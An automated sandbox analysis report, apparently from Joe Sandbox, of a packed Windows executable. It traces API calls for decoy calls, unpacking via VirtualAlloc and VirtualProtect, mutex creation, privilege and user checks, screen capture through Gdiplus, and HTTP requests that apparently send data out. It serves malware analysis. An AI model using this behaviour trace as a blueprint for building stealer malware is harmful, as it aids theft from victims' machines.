                    execution_graph 22615 438763 LoadLibraryA 22616 43878e CreateToolhelp32Snapshot Module32FirstW 22615->22616 22618 438830 22616->22618 22619 43882a 22616->22619 22621 4381a5 22619->22621 22622 4381c7 PeekMessageA 22621->22622 22623 4381e8 22622->22623 22624 4381fb 22623->22624 22625 438200 27 API calls 22623->22625 22626 4384ec GetTickCount 22624->22626 22629 438510 22624->22629 22641 43837c 22625->22641 22626->22624 22627 438651 GlobalAlloc GlobalAlloc 22631 438679 22627->22631 22628 438524 GetSystemTimes GetCPInfo GlobalMemoryStatus 22628->22629 22629->22627 22629->22628 22630 438635 LoadLibraryA 22629->22630 22632 4385a7 GetProcAddress 22629->22632 22630->22629 22650 4380ae 22631->22650 22640 43861d 22632->22640 22634 4386d7 VirtualProtect 22653 438162 22634->22653 22638 4386f9 GetStartupInfoW SetProcessShutdownParameters GetLastError GetTickCount 22639 43873f 22638->22639 22639->22618 22640->22627 22641->22624 22651 43811b LocalFree 22650->22651 22652 4380c7 22650->22652 22651->22634 22652->22651 22654 438170 22653->22654 22655 43819f 22653->22655 22656 438171 AddAtomW 22654->22656 22660 40329c 22655->22660 22662 61fdb4 22655->22662 22678 4033ec 22655->22678 22688 6203e4 22655->22688 22692 4033f0 22655->22692 22702 620321 22655->22702 22709 4033f4 22655->22709 22719 41a684 22655->22719 22726 43815a AddAtomW 22656->22726 22658 438183 FindFirstChangeNotificationW GetCurrentDirectoryA 22658->22656 22659 43819e 22658->22659 22659->22655 22661 4032cf 22660->22661 22661->22638 22663 61fdc1 22662->22663 22727 620b70 SetErrorMode SetErrorMode 22663->22727 22667 61ffb0 VirtualAlloc 22668 61ffdd 22667->22668 22669 620046 VirtualProtect 22668->22669 22671 620083 22669->22671 22670 6201b1 VirtualFree 22676 62036c 22670->22676 22677 620236 22670->22677 22671->22670 22672 62038b 22673 62025b LoadLibraryA 22673->22677 22674 6205e6 LoadLibraryA 22675 62063f 22674->22675 22676->22672 22676->22674 22677->22673 22677->22676 22679 4033f0 22678->22679 22680 40342c 22679->22680 22683 40343d 22679->22683 22734 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 22680->22734 22682 403436 22682->22683 22684 403478 FreeLibrary 22683->22684 22686 40347e 22683->22686 22684->22686 22685 4034b3 22686->22685 22687 4034ab ExitProcess 22686->22687 22691 6203b6 22688->22691 22689 6205e6 LoadLibraryA 22690 62063f 22689->22690 22691->22688 22691->22689 22693 40340d 22692->22693 22694 40342c 22693->22694 22695 40343d 22693->22695 22735 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 22694->22735 22698 403478 FreeLibrary 22695->22698 22700 40347e 22695->22700 22697 403436 22697->22695 22698->22700 22699 4034b3 22700->22699 22701 4034ab ExitProcess 22700->22701 22704 62024b 22702->22704 22703 62025b LoadLibraryA 22703->22704 22704->22703 22708 62036c 22704->22708 22705 62038b 22706 6205e6 LoadLibraryA 22707 62063f 22706->22707 22708->22705 22708->22706 22710 40340d 22709->22710 22711 40342c 22710->22711 22714 40343d 22710->22714 22736 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 22711->22736 22713 403436 22713->22714 22715 403478 FreeLibrary 22714->22715 22717 40347e 22714->22717 22715->22717 22716 4034b3 22717->22716 22718 4034ab ExitProcess 22717->22718 22737 404d00 GetModuleHandleA 22719->22737 22721 41a694 22739 419108 22721->22739 22724 4033f4 7 API calls 22725 41a6a3 22724->22725 22726->22658 22728 61ff9b 22727->22728 22729 620b08 22728->22729 22730 620b25 22729->22730 22731 620b33 GetPEB 22730->22731 22732 620b2e 22730->22732 22733 620b54 22731->22733 22732->22667 22733->22667 22734->22682 22735->22697 22736->22713 22738 404d33 22737->22738 22738->22721 22740 419110 22739->22740 23003 4034e4 22740->23003 22746 419155 23012 407d24 22746->23012 22752 41917e 22753 419189 CreateMutexA 22752->22753 22754 4191a3 22753->22754 22755 419f30 22754->22755 22756 4034e4 7 API calls 22754->22756 22757 4034e4 7 API calls 22755->22757 22766 4191b6 22756->22766 22758 419f48 22757->22758 23235 403b98 22758->23235 22761 4191e4 23080 418f9c 22761->23080 22762 4034e4 7 API calls 22765 419f63 22762->22765 22768 403b98 SysFreeString 22765->22768 22766->22761 22769 403798 7 API calls 22766->22769 23208 4036cc 7 API calls 22766->23208 22771 419f73 22768->22771 22769->22766 22770 406c4c 19 API calls 22772 4191f7 22770->22772 23239 403508 22771->23239 23091 406810 22772->23091 22779 419219 23126 4176d8 22779->23126 22782 403508 7 API calls 22784 419f9e 22782->22784 22786 403b80 SysFreeString 22784->22786 22788 419fa9 22786->22788 22790 403508 7 API calls 22788->22790 22789 4176d8 7 API calls 22795 41924c 22789->22795 22791 419fb9 22790->22791 22792 403b80 SysFreeString 22791->22792 22793 419fc4 22792->22793 22794 403508 7 API calls 22793->22794 22796 419fd4 22794->22796 22795->22755 22799 419272 22795->22799 22797 403b80 SysFreeString 22796->22797 22798 419fdf 22797->22798 22800 403508 7 API calls 22798->22800 23209 407428 7 API calls 22799->23209 22803 419fef 22800->22803 22802 41928b 23210 406984 7 API calls 22802->23210 22805 403b80 SysFreeString 22803->22805 22807 419ffa 22805->22807 22806 419299 23211 407428 7 API calls 22806->23211 22809 403508 7 API calls 22807->22809 22811 41a00a 22809->22811 22810 4192b2 23212 406ae4 7 API calls 22810->23212 22813 403b80 SysFreeString 22811->22813 22815 41a015 22813->22815 22814 4192c0 23213 40795c 12 API calls 22814->23213 22817 403508 7 API calls 22815->22817 22818 41a025 22817->22818 22820 403b80 SysFreeString 22818->22820 22819 4192d0 23214 407428 7 API calls 22819->23214 22822 41a030 22820->22822 22824 403508 7 API calls 22822->22824 22823 4192e9 23215 406984 7 API calls 22823->23215 22826 41a040 22824->22826 22828 403b80 SysFreeString 22826->22828 22827 4192fa 23216 4080c4 12 API calls 22827->23216 22830 41a04b 22828->22830 22832 403508 7 API calls 22830->22832 22831 419305 23217 408328 42 API calls 22831->23217 22834 41a05b 22832->22834 22835 403b98 SysFreeString 22834->22835 22836 41a06b 22835->22836 22837 4034e4 7 API calls 22836->22837 22838 41a076 22837->22838 22840 403b98 SysFreeString 22838->22840 22839 419909 23233 417290 56 API calls 22839->23233 22841 41a086 22840->22841 22844 4034e4 7 API calls 22841->22844 22843 41991c 23234 403850 7 API calls 22843->23234 22845 41a091 22844->22845 22847 403b98 SysFreeString 22845->22847 22849 41a0a1 22847->22849 22851 4034e4 7 API calls 22849->22851 22853 41a0ac 22851->22853 22858 403b98 SysFreeString 22853->22858 22855 40795c 12 API calls 22909 41930d 22855->22909 22860 41a0bc 22858->22860 22866 4034e4 7 API calls 22860->22866 22862 40357c 7 API calls 22862->22909 22870 41a0c7 22866->22870 22873 403b98 SysFreeString 22870->22873 22876 41a0d7 22873->22876 22881 403508 7 API calls 22876->22881 22879 419451 GetSystemMetrics GetSystemMetrics 23228 4178b4 24 API calls 22879->23228 22880 418688 45 API calls 22880->22909 22884 41a0e7 22881->22884 23246 404224 9 API calls 22884->23246 22886 407428 7 API calls 22886->22909 22889 41a0fa 22890 403508 7 API calls 22889->22890 22891 41a107 22890->22891 22893 4034e4 7 API calls 22891->22893 22895 41a10f 22893->22895 22897 4034e4 7 API calls 22895->22897 22901 41a117 22897->22901 22899 40dce8 8 API calls 22899->22909 22902 403508 7 API calls 22901->22902 22903 41a124 22902->22903 22905 403508 7 API calls 22903->22905 22907 41a131 22905->22907 22910 4034e4 7 API calls 22907->22910 22909->22755 22909->22839 22909->22855 22909->22862 22909->22879 22909->22880 22909->22886 22909->22899 22912 4037dc 7 API calls 22909->22912 22920 4070bc 8 API calls 22909->22920 22924 4034e4 7 API calls 22909->22924 22926 403850 7 API calls 22909->22926 22943 407048 9 API calls 22909->22943 22960 414408 33 API calls 22909->22960 23218 40d7f0 40 API calls 22909->23218 23219 4053d8 7 API calls 22909->23219 23220 414028 45 API calls 22909->23220 23221 408120 7 API calls 22909->23221 23222 405528 7 API calls 22909->23222 23223 414098 35 API calls 22909->23223 23224 415ea8 35 API calls 22909->23224 23225 4050c8 7 API calls 22909->23225 23226 414cb8 20 API calls 22909->23226 23227 414f40 25 API calls 22909->23227 23229 406fdc SysFreeString SysFreeString SysReAllocStringLen SysAllocStringLen 22909->23229 23230 403be8 9 API calls 22909->23230 23231 403d58 SysAllocStringLen SysAllocStringLen SysFreeString 22909->23231 23232 40781c 8 API calls 22909->23232 22911 41a139 22910->22911 22911->22724 22912->22909 22920->22909 22924->22909 22926->22909 22943->22909 22960->22909 23004 403505 23003->23004 23005 4034ea 23003->23005 23007 40357c 23004->23007 23005->23004 23247 402550 7 API calls 23005->23247 23009 403580 23007->23009 23008 4035a4 23011 40561c 63 API calls 23008->23011 23009->23008 23248 402550 7 API calls 23009->23248 23011->22746 23249 403538 23012->23249 23016 407d3d 23017 407d4d 23016->23017 23018 403538 7 API calls 23016->23018 23019 407b78 FreeSid 23017->23019 23018->23017 23020 407d57 23019->23020 23021 407d67 23020->23021 23022 403538 7 API calls 23020->23022 23023 407b78 FreeSid 23021->23023 23022->23021 23024 407d71 23023->23024 23025 407d81 23024->23025 23026 403538 7 API calls 23024->23026 23258 407c58 23025->23258 23026->23025 23028 407d96 23031 406c4c 23028->23031 23029 407d86 23029->23028 23030 403538 7 API calls 23029->23030 23030->23028 23032 406c54 23031->23032 23032->23032 23033 406c76 23032->23033 23034 406c88 23032->23034 23035 403538 7 API calls 23033->23035 23266 406e70 23034->23266 23037 406c83 23035->23037 23039 403508 7 API calls 23037->23039 23038 406c90 23271 406bb4 23038->23271 23041 406d78 23039->23041 23043 403b98 SysFreeString 23041->23043 23042 406ca3 23274 4065cc GetUserNameW 23042->23274 23044 406d85 23043->23044 23045 403508 7 API calls 23044->23045 23048 406d92 23045->23048 23047 406cb6 23280 406610 SysFreeString SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 23047->23280 23066 403798 23048->23066 23050 406cc9 23281 406258 7 API calls 23050->23281 23052 406cdf 23282 406258 7 API calls 23052->23282 23054 406cf2 23283 406258 7 API calls 23054->23283 23056 406d05 23284 406258 7 API calls 23056->23284 23058 406d18 23285 403850 7 API calls 23058->23285 23067 4037db 23066->23067 23068 40379c 23066->23068 23067->22752 23069 4037a6 23068->23069 23070 403538 23068->23070 23071 4037d0 23069->23071 23072 4037b9 23069->23072 23077 40354c 23070->23077 23326 4035a8 7 API calls 23070->23326 23329 403ac0 7 API calls 23071->23329 23328 403ac0 7 API calls 23072->23328 23074 40357a 23074->22752 23077->23074 23327 402550 7 API calls 23077->23327 23079 4037be 23079->22752 23081 418fb5 23080->23081 23082 4034e4 7 API calls 23081->23082 23089 418fd0 23082->23089 23083 4190d9 23084 4034e4 7 API calls 23083->23084 23085 4190ee 23084->23085 23086 4034e4 7 API calls 23085->23086 23087 4190f6 23086->23087 23087->22770 23089->23083 23090 403798 7 API calls 23089->23090 23330 4036cc 7 API calls 23089->23330 23090->23089 23092 406829 23091->23092 23093 4034e4 7 API calls 23092->23093 23099 40683e 23093->23099 23094 4068ae 23095 403508 7 API calls 23094->23095 23096 4068c8 23095->23096 23098 4034e4 7 API calls 23096->23098 23101 4068d0 23098->23101 23099->23094 23102 403798 7 API calls 23099->23102 23331 4036cc 7 API calls 23099->23331 23332 4067e8 7 API calls 23099->23332 23333 403850 7 API calls 23099->23333 23104 4037dc 23101->23104 23102->23099 23105 4037e0 23104->23105 23114 403798 23104->23114 23106 403538 23105->23106 23108 4037f0 23105->23108 23109 4037fe 23105->23109 23105->23114 23116 40354c 23106->23116 23334 4035a8 7 API calls 23106->23334 23107 40357a 23107->22779 23111 403538 7 API calls 23108->23111 23338 4035a8 7 API calls 23109->23338 23111->23114 23113 4037db 23113->22779 23114->23106 23114->23113 23115 4037a6 23114->23115 23118 4037d0 23115->23118 23119 4037b9 23115->23119 23116->23107 23335 402550 7 API calls 23116->23335 23117 403811 23123 403538 7 API calls 23117->23123 23337 403ac0 7 API calls 23118->23337 23336 403ac0 7 API calls 23119->23336 23125 40383d 23123->23125 23124 4037be 23124->22779 23125->22779 23128 4176f1 23126->23128 23127 417759 23130 4034e4 7 API calls 23127->23130 23128->23127 23339 4039e8 23128->23339 23131 41776e 23130->23131 23132 418688 23131->23132 23133 418691 23132->23133 23134 4186e7 23133->23134 23135 40357c 7 API calls 23133->23135 23136 4034e4 7 API calls 23134->23136 23135->23134 23137 4186ef 23136->23137 23138 40357c 7 API calls 23137->23138 23139 4186fa 23138->23139 23140 40357c 7 API calls 23139->23140 23141 41870b 23140->23141 23142 4039e8 7 API calls 23141->23142 23143 418713 GetModuleHandleA 23142->23143 23144 41872f 23143->23144 23145 41871f 23143->23145 23147 418733 23144->23147 23148 41874f 23144->23148 23146 4039e8 7 API calls 23145->23146 23150 418727 LoadLibraryA 23146->23150 23151 4039e8 7 API calls 23147->23151 23149 4039e8 7 API calls 23148->23149 23152 418757 GetProcAddress 23149->23152 23150->23144 23153 41873b 23151->23153 23154 4039e8 7 API calls 23152->23154 23155 4039e8 7 API calls 23153->23155 23156 41876c GetProcAddress 23154->23156 23157 418747 LoadLibraryA 23155->23157 23158 4039e8 7 API calls 23156->23158 23157->23148 23159 418781 GetProcAddress 23158->23159 23160 4039e8 7 API calls 23159->23160 23161 418796 GetProcAddress 23160->23161 23162 4039e8 7 API calls 23161->23162 23163 4187ab GetProcAddress 23162->23163 23164 4039e8 7 API calls 23163->23164 23165 4187c0 GetProcAddress 23164->23165 23166 4039e8 7 API calls 23165->23166 23167 4187d5 GetProcAddress 23166->23167 23168 4039e8 7 API calls 23167->23168 23169 4187e9 GetProcAddress 23168->23169 23170 4039e8 7 API calls 23169->23170 23171 418800 GetProcAddress 23170->23171 23172 41881c 23171->23172 23173 4188f2 InternetCrackUrlA 23172->23173 23174 418901 23173->23174 23347 4039f0 23174->23347 23176 418977 InternetOpenA 23178 418991 InternetConnectA 23176->23178 23179 418ad6 23176->23179 23177 418922 23177->23176 23180 4037dc 7 API calls 23177->23180 23178->23179 23194 4189d4 23178->23194 23181 418b28 23179->23181 23188 418ae5 23179->23188 23182 41895b 23180->23182 23184 403538 7 API calls 23181->23184 23354 417f6c 45 API calls 23182->23354 23187 418b33 23184->23187 23186 418969 23186->23176 23189 4034e4 7 API calls 23187->23189 23356 418124 25 API calls 23188->23356 23190 418b3b 23189->23190 23192 403508 7 API calls 23190->23192 23193 418b58 23192->23193 23195 403508 7 API calls 23193->23195 23196 418a1c HttpOpenRequestA 23194->23196 23197 418b65 23195->23197 23198 418ad0 InternetCloseHandle 23196->23198 23203 418a31 23196->23203 23199 403508 7 API calls 23197->23199 23198->23179 23200 418b72 23199->23200 23201 403508 7 API calls 23200->23201 23202 418b7f 23201->23202 23202->22789 23204 418a66 HttpSendRequestA 23203->23204 23204->23198 23205 418a79 23204->23205 23205->23198 23207 403798 7 API calls 23205->23207 23355 4035d4 7 API calls 23205->23355 23207->23205 23208->22766 23209->22802 23210->22806 23211->22810 23212->22814 23213->22819 23214->22823 23215->22827 23216->22831 23217->22909 23218->22909 23219->22909 23220->22909 23221->22909 23222->22909 23223->22909 23224->22909 23225->22909 23226->22909 23227->22909 23228->22909 23229->22909 23230->22909 23231->22909 23232->22909 23233->22843 23236 403b9e 23235->23236 23237 403ba4 SysFreeString 23236->23237 23238 403bb6 23236->23238 23237->23236 23238->22762 23240 40350e 23239->23240 23241 403534 23240->23241 23358 402550 7 API calls 23240->23358 23243 403b80 23241->23243 23244 403b94 23243->23244 23245 403b86 SysFreeString 23243->23245 23244->22782 23245->23244 23246->22889 23247->23004 23248->23008 23250 40353c 23249->23250 23253 40354c 23249->23253 23250->23253 23264 4035a8 7 API calls 23250->23264 23251 40357a 23255 407b78 23251->23255 23253->23251 23265 402550 7 API calls 23253->23265 23256 407bb7 FreeSid 23255->23256 23256->23016 23259 407c9e 23258->23259 23260 407ca4 LookupAccountSidA CheckTokenMembership 23259->23260 23261 407d1d 23259->23261 23262 407cf2 FreeSid 23260->23262 23261->23029 23262->23029 23264->23253 23265->23251 23267 403b80 SysFreeString 23266->23267 23268 406e7f 23267->23268 23286 406dac 23268->23286 23314 407500 23271->23314 23275 406601 23274->23275 23276 4065ef 23274->23276 23277 4065ff 23275->23277 23278 403b80 SysFreeString 23275->23278 23279 403d10 4 API calls 23276->23279 23277->23047 23278->23277 23279->23277 23280->23050 23281->23052 23282->23054 23283->23056 23284->23058 23287 406dc6 23286->23287 23288 4040f4 SysAllocStringLen 23286->23288 23298 4040f4 23287->23298 23288->23287 23290 406dce 23291 406dff RegOpenKeyExW 23290->23291 23302 403d3c 23291->23302 23295 406e44 23296 403b98 SysFreeString 23295->23296 23297 406e5e 23296->23297 23297->23038 23299 404110 23298->23299 23300 4040fa SysAllocStringLen 23298->23300 23299->23290 23300->23299 23301 403b50 23300->23301 23301->23298 23303 403d40 RegQueryValueExW 23302->23303 23304 403d10 23303->23304 23305 403c74 23304->23305 23306 403b80 23305->23306 23307 403c7c SysAllocStringLen 23305->23307 23310 403b94 23306->23310 23311 403b86 SysFreeString 23306->23311 23308 403b50 23307->23308 23309 403c8c SysFreeString 23307->23309 23312 4040fa SysAllocStringLen 23308->23312 23313 404110 23308->23313 23309->23295 23310->23295 23311->23310 23312->23308 23312->23313 23313->23295 23315 4040f4 SysAllocStringLen 23314->23315 23316 40751a 23315->23316 23317 4040f4 SysAllocStringLen 23316->23317 23318 407522 23317->23318 23319 407579 RegOpenKeyExW 23318->23319 23320 407546 23318->23320 23319->23320 23321 40759d RegQueryValueExW 23320->23321 23322 403d10 4 API calls 23321->23322 23323 4075be 23322->23323 23324 403b98 SysFreeString 23323->23324 23325 406bce 23324->23325 23325->23042 23326->23077 23327->23074 23328->23079 23329->23079 23330->23089 23331->23099 23332->23099 23334->23116 23335->23107 23336->23124 23337->23124 23338->23117 23340 40399c 23339->23340 23341 4039d7 23340->23341 23345 4035a8 7 API calls 23340->23345 23341->23128 23343 4039b3 23343->23341 23346 402550 7 API calls 23343->23346 23345->23343 23346->23341 23348 403a22 23347->23348 23349 4039f5 23347->23349 23350 4034e4 7 API calls 23348->23350 23349->23348 23352 403a09 23349->23352 23351 403a18 23350->23351 23351->23177 23357 4035d4 7 API calls 23352->23357 23354->23186 23355->23205 23356->23181 23357->23351 23358->23240 23359 417b1a 23360 417b29 20 API calls 23359->23360 23361 417c2d 23359->23361 23360->23361 23362 401f5c 23363 401f70 23362->23363 23364 401f79 23362->23364 23380 401870 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 23363->23380 23367 401fa2 RtlEnterCriticalSection 23364->23367 23368 401fac 23364->23368 23371 401f81 23364->23371 23366 401f75 23366->23364 23366->23371 23367->23368 23368->23371 23374 401e68 23368->23374 23372 4020d7 23373 4020cd RtlLeaveCriticalSection 23373->23372 23377 401e78 23374->23377 23375 401ea4 23378 401ec8 23375->23378 23386 401c7c 23375->23386 23377->23375 23377->23378 23381 401ddc 23377->23381 23378->23372 23378->23373 23380->23366 23390 401630 23381->23390 23383 401dec 23384 401df9 23383->23384 23399 401d50 9 API calls 23383->23399 23384->23377 23387 401cd1 23386->23387 23388 401c9a 23386->23388 23387->23388 23418 401bcc 23387->23418 23388->23378 23394 40164c 23390->23394 23391 401656 23400 40151c 23391->23400 23394->23391 23395 401662 23394->23395 23397 4016a7 23394->23397 23404 401388 23394->23404 23412 401284 LocalAlloc 23394->23412 23395->23383 23413 401464 23397->23413 23399->23384 23402 401562 23400->23402 23401 401592 23401->23395 23402->23401 23403 40157e VirtualAlloc 23402->23403 23403->23401 23403->23402 23405 401397 VirtualAlloc 23404->23405 23407 4013c4 23405->23407 23408 4013e7 23405->23408 23417 40123c LocalAlloc 23407->23417 23408->23394 23410 4013d0 23410->23408 23411 4013d4 VirtualFree 23410->23411 23411->23408 23412->23394 23416 401493 23413->23416 23414 4014ec 23414->23395 23415 4014c0 VirtualFree 23415->23416 23416->23414 23416->23415 23417->23410 23420 401be2 23418->23420 23419 401c6a 23419->23388 23420->23419 23421 401c21 23420->23421 23422 401c0d 23420->23422 23424 4017e4 3 API calls 23421->23424 23431 4017e4 23422->23431 23425 401c1f 23424->23425 23425->23419 23441 401aa8 9 API calls 23425->23441 23427 401c45 23428 401c5f 23427->23428 23442 401afc 9 API calls 23427->23442 23443 4012f4 LocalAlloc 23428->23443 23432 40180a 23431->23432 23440 401863 23431->23440 23444 4015b0 23432->23444 23436 401827 23437 40183e 23436->23437 23438 401464 VirtualFree 23436->23438 23437->23440 23449 4012f4 LocalAlloc 23437->23449 23438->23437 23440->23425 23441->23427 23442->23428 23443->23419 23446 4015e7 23444->23446 23445 401627 23448 401284 LocalAlloc 23445->23448 23446->23445 23447 401601 VirtualFree 23446->23447 23447->23446 23448->23436 23449->23440 23450 40370c 23456 403640 23450->23456 23451 403662 23454 403695 23451->23454 23466 403604 WideCharToMultiByte 23451->23466 23452 403659 23453 4034e4 7 API calls 23452->23453 23464 403660 23453->23464 23468 403ac0 7 API calls 23454->23468 23456->23451 23456->23452 23458 403680 23458->23454 23461 403686 23458->23461 23459 4036a2 23469 403604 WideCharToMultiByte 23459->23469 23467 4035d4 7 API calls 23461->23467 23463 4036b0 23470 403ac0 7 API calls 23463->23470 23466->23458 23467->23464 23468->23459 23469->23463 23470->23464 23471 40955e 23472 409583 23471->23472 23473 409569 LoadLibraryA GetProcAddress 23471->23473 23473->23472

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4381a5-4381ef PeekMessageA 3 4381f5-4381f9 0->3 4 4384ad-4384d7 0->4 5 438200-4384a8 GetConsoleAliasesW CreateNamedPipeA CreateMemoryResourceNotification DlgDirSelectComboBoxExW InsertMenuItemW AppendMenuW UnloadKeyboardLayout SetRectRgn ExtractAssociatedIconA ExtractIconEx FindFirstChangeNotificationW GetRegisteredRawInputDevices * 2 GetNextDlgGroupItem CallMsgFilter OpenClipboard GetClipboardSequenceNumber GetLastError DragQueryFileW ShellAboutA LoadMenuIndirectA LoadIconW MapVirtualKeyExW StretchBlt SetPixel ShellExecuteA BeginPaint 3->5 6 4381fb 3->6 7 4384db-4384e1 4->7 5->4 6->4 8 4384e3-4384ea 7->8 9 438510-438517 7->9 12 438507-43850e 8->12 13 4384ec-438501 GetTickCount 8->13 10 43851b-43851e 9->10 14 438651-438688 GlobalAlloc * 2 call 43803c 10->14 15 438524-438568 GetSystemTimes GetCPInfo GlobalMemoryStatus 10->15 12->7 13->12 27 438697-4386a0 14->27 16 43861f-438623 15->16 17 43856e-438575 15->17 22 438625-438629 16->22 23 43862c-438633 16->23 17->16 20 43857b-438585 17->20 20->16 26 43858b-438595 20->26 22->23 24 438645-43864c 23->24 25 438635-438640 LoadLibraryA 23->25 24->10 25->24 26->16 29 43859b-4385a5 26->29 30 4386a2-4386c5 27->30 31 4386c7-4386f6 call 4380ae VirtualProtect call 438162 27->31 29->16 32 4385a7-4385c7 29->32 30->27 61 4386f6 call 4033f0 31->61 62 4386f6 call 620321 31->62 63 4386f6 call 4033f4 31->63 64 4386f6 call 61fdb4 31->64 65 4386f6 call 41a684 31->65 66 4386f6 call 6203e4 31->66 67 4386f6 call 4033ec 31->67 68 4386f6 call 40329c 31->68 40 4385cd-4385e8 32->40 40->40 42 4385ea-43861d GetProcAddress 40->42 42->14 44 4386f9-438760 GetStartupInfoW SetProcessShutdownParameters GetLastError GetTickCount 61->44 62->44 63->44 64->44 65->44 66->44 67->44 68->44
                    APIs
                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004381D5
                    • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 0043820B
                    • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00438221
                    • CreateMemoryResourceNotification.KERNEL32(00000000), ref: 00438229
                    • DlgDirSelectComboBoxExW.USER32(00000000,?,00000000,00000000), ref: 0043823C
                    • InsertMenuItemW.USER32(00000000,00000000,00000000,00000000), ref: 0043824A
                    • AppendMenuW.USER32(00000000,00000000,00000000,00000000), ref: 00438258
                    • UnloadKeyboardLayout.USER32(00000000), ref: 00438260
                    • SetRectRgn.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00438270
                    • ExtractAssociatedIconA.SHELL32(00000000,?,?), ref: 00438286
                    • ExtractIconEx.SHELL32(00000000,00000000,?,?,00000000), ref: 0043829D
                    • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004382A9
                    • GetRegisteredRawInputDevices.USER32(00000000,00000000,00000000), ref: 004382B5
                    • GetRegisteredRawInputDevices.USER32(00000000,00000000,00000000), ref: 004382C1
                    • GetNextDlgGroupItem.USER32(00000000,00000000,00000000), ref: 004382CD
                    • CallMsgFilter.USER32(00000000,00000000), ref: 004382D7
                    • OpenClipboard.USER32(00000000), ref: 004382DF
                    • GetClipboardSequenceNumber.USER32 ref: 004382E5
                    • GetLastError.KERNEL32 ref: 004382EB
                    • DragQueryFileW.SHELL32(00000000,00000000,00000000,00000000), ref: 004382F9
                    • ShellAboutA.SHELL32(00000000,00000000,00000000,00000000), ref: 00438307
                    • LoadMenuIndirectA.USER32(00000000), ref: 0043830F
                    • LoadIconW.USER32(00000000,00000000), ref: 00438319
                    • MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00438325
                    • GetTickCount.KERNEL32 ref: 00438501
                    • GetSystemTimes.KERNEL32(?,?,?), ref: 00438540
                    • GetCPInfo.KERNEL32(00000000,?), ref: 0043854E
                    • GlobalMemoryStatus.KERNEL32(?), ref: 0043855B
                    • GetProcAddress.KERNEL32(00441C08), ref: 00438607
                    • LoadLibraryA.KERNEL32(00441AD0), ref: 0043863A
                    • GlobalAlloc.KERNEL32(00000000,00014C32), ref: 00438656
                    • GlobalAlloc.KERNEL32(00000000,00014C32), ref: 00438664
                    • VirtualProtect.KERNEL32(?,00014C32,00000020,00447E8C), ref: 004386E5
                    • GetStartupInfoW.KERNEL32(00000000), ref: 004386FB
                    • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00438705
                    • GetLastError.KERNEL32 ref: 0043870B
                    • GetTickCount.KERNEL32 ref: 00438711
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd
                    Similarity
                    • API ID: GlobalIconLoadMenu$AllocClipboardCountCreateDevicesErrorExtractInfoInputItemLastMemoryNotificationRegisteredTickVirtual$AboutAddressAliasesAppendAssociatedCallChangeComboConsoleDragFileFilterFindFirstGroupIndirectInsertKeyboardLayoutLibraryMessageNamedNextNumberOpenParametersPeekPipeProcProcessProtectQueryRectResourceSelectSequenceShellShutdownStartupStatusSystemTimesUnload
                    • String ID: @<$>!B$@$dusurubipopimitikiruyafelezeruxa gewewasehejumubilabomidetelo lelusu
                    • API String ID: 2871737881-933728795
                    • Opcode ID: ea71e4bb7916ca47ecbc02519c63b2ee1e25f1868df8a286cc2f0fd2c4e2ab98
                    • Instruction ID: f12e34e91f97c90a2e5a1dd792cffaf7dc6ae6327b3ffaf23229371eec0cbeca
                    • Opcode Fuzzy Hash: ea71e4bb7916ca47ecbc02519c63b2ee1e25f1868df8a286cc2f0fd2c4e2ab98
                    • Instruction Fuzzy Hash: 8BF17171D44348EFEB20DBA4DD4ABDDBBB4AB04705F1040AAF209BA1D1DBB45A45CF19

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                    • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                    • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
